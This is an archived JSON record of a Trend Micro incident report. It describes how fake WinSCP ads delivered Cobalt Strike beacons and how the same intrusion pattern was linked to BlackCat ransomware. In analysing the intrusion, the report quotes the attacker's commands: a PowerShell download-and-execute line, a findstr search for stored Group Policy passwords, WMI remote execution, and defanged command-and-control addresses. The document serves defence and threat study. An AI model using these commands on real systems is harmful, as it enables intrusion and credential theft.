{
	"id": "0d19c198-1a78-441d-92c3-6e877be32fa9",
	"created_at": "2026-04-06T00:08:44.412094Z",
	"updated_at": "2026-04-10T03:29:39.8946Z",
	"deleted_at": null,
	"sha1_hash": "bb278f11ce63ffb92da1b87ac40c6bf7b59dfaf1",
	"title": "Malvertising Used as Entry Vector for BlackCat Actors Also Leverage SpyBoy Terminator",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1891551,
	"plain_text": "Malvertising Used as Entry Vector for BlackCat Actors Also Leverage\r\nSpyBoy Terminator\r\nPublished: 2023-06-30 · Archived: 2026-04-05 13:10:19 UTC\r\nRecently, the Trend Micro incident response team engaged with a targeted organization after having identified highly\r\nsuspicious activities through the Targeted Attack Detection (TAD) service. In the investigation, malicious actors used\r\nmalvertising to distribute a piece of malware via cloned webpages of legitimate organizations. In this case, the distribution\r\ninvolved a webpage of the well-known application WinSCP, an open-source Windows application for file transfer.\r\nAdvertising platforms like Google Ads enable businesses to display advertisements to target audiences to\r\nboost traffic and increase sales. Malware distributors abuse the same functionality in a technique known as malvertising,\r\nwhere chosen keywords are hijacked to display malicious ads that lure unsuspecting search engine users into downloading\r\ncertain types of malware.\r\nThe targeted organization conducted a joint investigation with the Trend team and discovered that cybercriminals performed\r\nthe following unauthorized and malicious activities within the company’s network:\r\nStole top-level administrator privileges and used these privileges to conduct unauthorized activities\r\nAttempted to establish persistence and backdoor access to the customer environment using remote management tools\r\nlike AnyDesk\r\nAttempted to steal passwords and tried to access backup servers\r\nIt is highly likely that the enterprise would have been substantially affected by the attack if intervention had been sought\r\nlater, especially since the threat actors had already succeeded in gaining initial access to domain administrator privileges and\r\nstarted establishing backdoors and persistence.\r\nThe following chart represents how the infection starts.\r\nhttps://www.trendmicro.com/en_us/research/23/f/malvertising-used-as-entry-vector-for-blackcat-actors-also-lever.html\r\nPage 1 of 8\n\nFigure 1. Infection chain of the observed attack\r\nIn the following sections, we discuss the details of this case: how threat actors made the initial access, what kind of attacks\r\nthey carried out, and the lessons that can be drawn from this event.\r\nDeep dive into the infection chain\r\nThe infection starts once the user searches for “WinSCP Download” on the Bing search engine. A malicious ad for the\r\nWinSCP application is displayed above the organic search results. The ad leads to a suspicious website containing a tutorial\r\non how to use WinSCP for automating file transfer.\r\nFigure 2. A suspicious site from a malvertisement\r\nFrom this first page, the user is then redirected to a cloned download webpage of WinSCP (winsccp[.]com). Once the user\r\nselects the “Download” button, an ISO file is downloaded from an infected WordPress webpage\r\n(hxxps://events.drdivyaclinic[.]com). Recently, the malicious actor changed their final stage payload URL to the file-sharing\r\nservice 4shared.\r\nFigure 3. Malicious download site\r\nThe overall infection flow involves delivering the initial loader, fetching the bot core, and ultimately, dropping the payload,\r\ntypically a backdoor.\r\nIn summary, the malicious actor uses the following malvertising infection chain:\r\n1. A user searches for an application by entering a search term in a search bar (such as Google or Bing). In this\r\nexample, the user wants to download the WinSCP application and enters the search term “WinSCP Download” on the\r\nBing search bar.\r\n2. Above the organic search results, the user finds a malvertisement for the WinSCP application that leads to a\r\nmalicious website.\r\n3. Once the user selects the “Download” button, this begins the download of an ISO file to their system.\r\nOn Twitter, user @rerednawyerg first spotted the same infection chain mimicking the AnyDesk\r\napplication. Once the user mounts the ISO, it contains two files, setup.exe and msi.dll. We list the details of these two files\r\nhere:\r\nSetup.exe: A renamed msiexec.exe executable\r\nMsi.dll: A delayed-loaded DLL (not loaded until a user’s code attempts to reference a symbol\r\ncontained within the DLL) that will act as a dropper for a real WinSCP installer and a malicious Python execution\r\nenvironment responsible for downloading Cobalt Strike beacons.\r\nFigure 4. The files downloaded once a user mounts the ISO\r\nOnce setup.exe is executed, it will call the msi.dll that will later extract a Python folder from the DLL RCDATA section as a\r\nreal installer for WinSCP to be installed on the machine. Two installations of Python 3.10 will be created — a legitimate\r\npython installation in %AppDataLocal%\\Python-3.10.10 and another installation in %Public%\\Music\\python containing a\r\ntrojanized python310.dll. Finally, the DLL will create a persistence mechanism to make a run key named “Python” and the\r\nvalue C:\\Users\\Public\\Music\\python\\pythonw.exe.\r\nFigure 5. The run key named “Python”\r\nWhen the executable pythonw.exe starts, it loads a modified/trojanized obfuscated python310.dll that contains a Cobalt\r\nStrike beacon that connects to 167[.]88[.]164[.]141.\r\nThe following command-and-control (C\u0026C) servers are used to obtain the main beacon module:\r\nFile name C\u0026C\r\npp.py hxxps://167.88.164.40/python/pp2\r\nwork2.py hxxps://172.86.123.127:8443/work2z\r\nwork2-2.py hxxps://193.42.32.58:8443/work2z\r\nwork3.py hxxps://172.86.123.226:8443/work3z\r\nMultiple scheduled tasks executing batch files for persistence were also created in the machine. These batch files execute\r\nPython scripts leading to in-memory execution of Cobalt Strike beacons. Interestingly, the Python scripts use the marshal\r\nmodule to execute a pseudo-compiled (.pyc) code that is leveraged to download and execute the malicious beacon module in\r\nmemory.\r\nThe Trend Vision One™ platform was able to generate the following Workbench for the previously mentioned kill chain.\r\nFigure 6. Kill chain for the executed malware\r\nThe threat actor used a few other tools for discovery in the customer's environment. First, they used AdFind, a tool designed\r\nto retrieve and display information from Active Directory (AD) environments. In the hands of a threat actor, AdFind can be\r\nmisused for enumeration of user accounts, privilege escalation, and even password hash extraction.\r\nIn this case, the threat actor used it to fetch information on the operating system using the command adfind.exe -f\r\nobjectcategory=computer -csv name cn OperatingSystem dNSHostName. The command specifies that it wants to retrieve\r\nthe values of the name, common name (CN), operating system, and dNSHostName attributes for each computer object and\r\noutput its result in a CSV format.\r\nThe threat actor used the following PowerShell command to gather user information and to save it into a CSV file:\r\nGet-ADUser -Filter * -Properties * | Select -Property\r\nEmailAddress,GivenName,Surname,DisplayName,sAMAccountName,Title,Department,OfficePhone,MobilePhone,Fax,Enabled,LastLog\r\n| Export-CSV \"C:\\users\\public\\music\\ADusers.csv\" -NoTypeInformation -Encoding UTF8\r\nWe also observed that the threat actor used AccessChk64, a command-line tool developed by Sysinternals that is primarily\r\nused for checking the security permissions and access rights of objects in Windows. Although the threat actor’s purpose for\r\nusing the tool in this instance is not clear, it should be noted that the tool can be used for gaining insights on what\r\npermissions are assigned to users and groups, as well as for privilege escalation and the identification of files, directories, or\r\nservices with weak access control settings.\r\nThe threat actor then used findstr, a command-line tool in Windows used for searching strings or regular expressions within\r\nfiles by using the command findstr /S /I cpassword \\\\\u003cREDACTED\u003e\\sysvol\\\u003cREDACTED\u003e\\policies\\*.xml.\r\nIt is possible that the purpose of this command is to identify any XML files that contain the string cpassword. This is\r\ninteresting from a security context since cpassword is associated with a deprecated method of storing passwords in Group\r\nPolicy Preferences within AD.\r\nFigure 7. How findstr is used in the attack\r\nWe also observed the execution of scripts with PowerShell. For instance, the command IEX (New-Object\r\nNet.Webclient).DownloadString('hxxp://127[.]0[.]0[.]1:40347/'); Invoke-FindLocalAdminAccess -Thread 50 invokes a\r\nPowerShell function called Invoke-FindLocalAdminAccess and passes the parameter -Thread with a value of 50. This\r\nfunction is likely part of a script that performs actions related to finding local administrator access on a system.\r\nAnother PowerShell script used by the threat actor was PowerView. PowerView, which belongs to the PowerSploit\r\ncollection of scripts used to assist in penetration testing and security operations, focuses on AD reconnaissance and\r\nenumeration and is commonly used by threat actors to gather information about the AD environment.\r\nThe PowerShell Expand-Archive command was used to extract the ZIP files.\r\npowershell -w hidden -command Expand-Archive C:\\users\\public\\videos\\python.zip -DestinationPath\r\nC:\\users\\public\\videos\\python\r\nWMI was used to launch CoBeacon remotely across the environment.\r\nC:\\WINDOWS\\system32\\cmd.exe /C wmic /NODE:\"\u003cREDACTED\u003e\" process call create\r\nC:\\users\\public\\videos\\python\\pythonw.exe C:\\users\\public\\videos\\python\\work2-2.py\r\nTo obtain high-privileged credentials and escalate privileges, the threat actor used a Python script also containing the\r\nmarshal module to execute a pseudo-compiled code for LaZagne. Another script to obtain Veeam\r\ncredentials following the same structure was also identified in the environment.\r\nPsExec, BitsAdmin, and curl were used to download additional tools and to move laterally across the environment.\r\nThe threat actor dropped a detailed KillAV BAT script (KillAV is a type of malicious software specifically designed to\r\ndisable or bypass antivirus or antimalware programs installed on a target system) to tamper with Trend protections.\r\nHowever, due to the agent’s Self-Protection features and VSAPI detections, the attempt failed. The threat actors also made\r\nattempts to stop Windows Defender through a different KillAV BAT script.\r\nFinally, the threat actor installed the AnyDesk remote management tool (renamed install.exe) in the environment to maintain\r\npersistence.\r\nFigure 8. Remote management tool installed for persistence\r\nAfter a diligent and proactive response, the attacker was successfully evicted from the network before they could reach their\r\ngoal or execute their final payload. The incident response team also presented immediate countermeasures as well as\r\nmedium- and long-term security procedures for implementation.\r\nBlackCat uses the same tools, techniques, and procedures (TTPs)\r\nIn another investigation, following the same TTPs described previously, we were able to identify that this activity\r\nled to a BlackCat (aka ALPHV) infection. Along with other types of malware and tools already mentioned, we\r\nwere able to identify the use of the anti-antivirus or anti-endpoint detection and response (EDR) SpyBoy\r\nTerminator in an attempt to tamper with protection provided by agents.\r\nIn order to exfiltrate the customer data, the threat actor used PuTTY Secure Copy client (PSCP) to transfer the gathered\r\ninformation. Investigating one of the C\u0026C domains used by the threat actor behind this infection also led to the discovery of\r\na possible related Cl0p ransomware file.\r\nFigure 9. Files indicating possible Cl0p ransomware file\r\nConclusion and recommendations\r\nIn recent years, attackers have become increasingly adept at exploiting vulnerabilities that victims themselves are unaware\r\nof and have started employing behaviors that organizations do not anticipate. In addition to a continuous effort to prevent\r\nany unauthorized access, early detection and response within an organization’s network is critical. Immediacy in remediation\r\nis also essential, as delays in reaction time could lead to serious damage.\r\nBy understanding attack scenarios in detail, organizations can not only identify vulnerabilities that could lead to compromise\r\nand critical damage but also take necessary measures to prevent them.\r\nOrganizations can protect themselves by taking the following security measures:\r\nEducate employees about phishing. Conduct training sessions to educate employees about phishing attacks and\r\nhow to identify and avoid them. Emphasize the importance of not selecting suspicious links and not downloading\r\nfiles from unknown sources.\r\nMonitor and log activities. Implement a centralized logging system to collect and analyze logs from various\r\nnetwork devices and systems. Monitor network traffic, user activities, and system logs to detect any unusual or\r\nsuspicious behavior.\r\nDefine normal network traffic for normal operations. Defining normal network traffic will help identify abnormal\r\nnetwork traffic, such as unauthorized access.\r\nImprove incident response and communication. Develop an incident response plan to guide your organization's\r\nresponse in case of future breaches. Establish clear communication channels to inform relevant stakeholders,\r\nincluding employees, customers, and regulatory bodies, about a breach and the steps being taken to address it.\r\nEngage with a cybersecurity professional. If your organization lacks the expertise or resources to handle the\r\naftermath of a breach effectively, consider engaging with a reputable cybersecurity firm to assist with incident\r\nresponse, forensic analysis, and security improvements.\r\nIndicators of Compromise (IOCs)\r\nThe full list of IOCs can be found here.\r\nSource: https://www.trendmicro.com/en_us/research/23/f/malvertising-used-as-entry-vector-for-blackcat-actors-also-lever.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/23/f/malvertising-used-as-entry-vector-for-blackcat-actors-also-lever.html"
	],
	"report_names": [
		"malvertising-used-as-entry-vector-for-blackcat-actors-also-lever.html"
	],
	"threat_actors": [
		{
			"id": "6e23ce43-e1ab-46e3-9f80-76fccf77682b",
			"created_at": "2022-10-25T16:07:23.303713Z",
			"updated_at": "2026-04-10T02:00:04.530417Z",
			"deleted_at": null,
			"main_name": "ALPHV",
			"aliases": [
				"ALPHV",
				"ALPHVM",
				"Ambitious Scorpius",
				"BlackCat Gang",
				"UNC4466"
			],
			"source_name": "ETDA:ALPHV",
			"tools": [
				"ALPHV",
				"ALPHVM",
				"BlackCat",
				"GO Simple Tunnel",
				"GOST",
				"Impacket",
				"LaZagne",
				"MEGAsync",
				"Mimikatz",
				"Munchkin",
				"Noberus",
				"PsExec",
				"Remcom",
				"RemoteCommandExecution",
				"WebBrowserPassView"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434124,
	"ts_updated_at": 1775791779,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bb278f11ce63ffb92da1b87ac40c6bf7b59dfaf1.pdf",
		"text": "https://archive.orkl.eu/bb278f11ce63ffb92da1b87ac40c6bf7b59dfaf1.txt",
		"img": "https://archive.orkl.eu/bb278f11ce63ffb92da1b87ac40c6bf7b59dfaf1.jpg"
	}
}